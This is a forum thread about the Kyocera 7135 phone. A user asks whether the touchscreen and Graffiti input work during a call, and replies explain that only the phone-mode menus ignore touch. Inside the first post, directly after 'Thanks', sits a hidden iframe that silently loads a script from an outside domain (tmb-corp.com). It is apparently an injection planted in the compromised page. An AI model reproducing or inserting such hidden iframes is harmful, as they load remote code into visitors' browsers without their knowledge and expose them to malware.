+ Reply to Thread

touchscreen/Grafitti Input during call

Tried to search for this answer but no luck. CNET review appears to say that touchscreen is disabled during call. I want to be able to

1. Use all palm apps via touch screen during call

2. input using touch and graffitti during call -- for example, during call, bring up calendar, touch screen for specific time, then graffitti input to that specific time

Can I do this?

Thanks<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Re: touchscreen/Graffiti Input during call

Originally posted by DougF
    Tried to search for this answer but no luck. CNET review appears to say that touchscreen is disabled during call. I want to be able to

1. Use all palm apps via touch screen during call

2. input using touch and graffiti during call -- for example, during call, bring up calendar, touch screen for specific time, then graffiti input to that specific time

Can I do this?

Thanks
    The CNET review did not do a good job explaining what they meant. The Phone Application (where you place and answer calls) has a menu with several options depending on the state the phone is in. This menu, and some, but not all of the applications the menu brings up, are not touch sensitive and you need to use the OK and scroll buttons. For users who are used to doing everything with graffiti, this can be a little disconcerting.

You absolutely can bring up any PALM application and use Graffiti and touch screen while on a call.

Alan

CNET reports Touchpad is Disabled when phone in use

CNET review says that the touchscreen is disabled when the phone is in use. Is this true? Does that mean that when I am talking to someone and need to look up an address or notepad item I am not able to access the Palm side?

I was thinking of getting the 7135 as a replacement for my aging 6035 which has stopped sync'ing with Yahoo address book. The touchscreen is also getting less accurate. But the above limitation would be tough to live with.

Sorry if this question is already posted somewhere. I looked around but could not find it.

HA!

kford, this one did make me laugh.

You're right. It has been posted before. In fact, this was one of the first comments/questions posted when the 7135 was first being released. Heck, it's so old the FAQ would almost certainly ignore it.

In fact, the comment on CNET is correct. The touchscreen is disabled. And no, you shouldn't worry about it. It won't have any impact on what you are considering.

Simply put, when you open the the phone up and it is in phone mode, you see a list called the "Main Menu". This list includes items such as "Recent Calls, Phone Number, Phone Preferences, Messages, Address Book, and Exit Phone". At this point, the touchscreen is disabled. But you still scroll through these options with the up down buttons. It's just that you can't touch an item on the screen with the stylus at this point. That's all. Also, when you are in the call and the screen is in Phone mode, the touchscreen continues to be disabled. This actually makes sense, because your ear, which is resting just above, or even on the screen could start "pressing buttons" so to speak. So they disabled it in this mode.

But if you want to go to any app, you still can. You just click the app button on the grafitti screen and go right to the standard Palm screens that you are used to. All while being in a call. Then the screen is out of the phone mode. You are still connected and can still be in your call. But at this point, since you ear would not be on the device, you will probably want to engage the speakerphone.

CNET is not wrong. But it makes the issue seem bigger than it is. It was actually a smart move for them to do what they did in my opinion. Several other reviews that came out when the 7135 was released made the same "complaint". I think they were just looking for something to write about. It's really a non-issue.

Hope that helps.

Steve

Thanks for the clarification.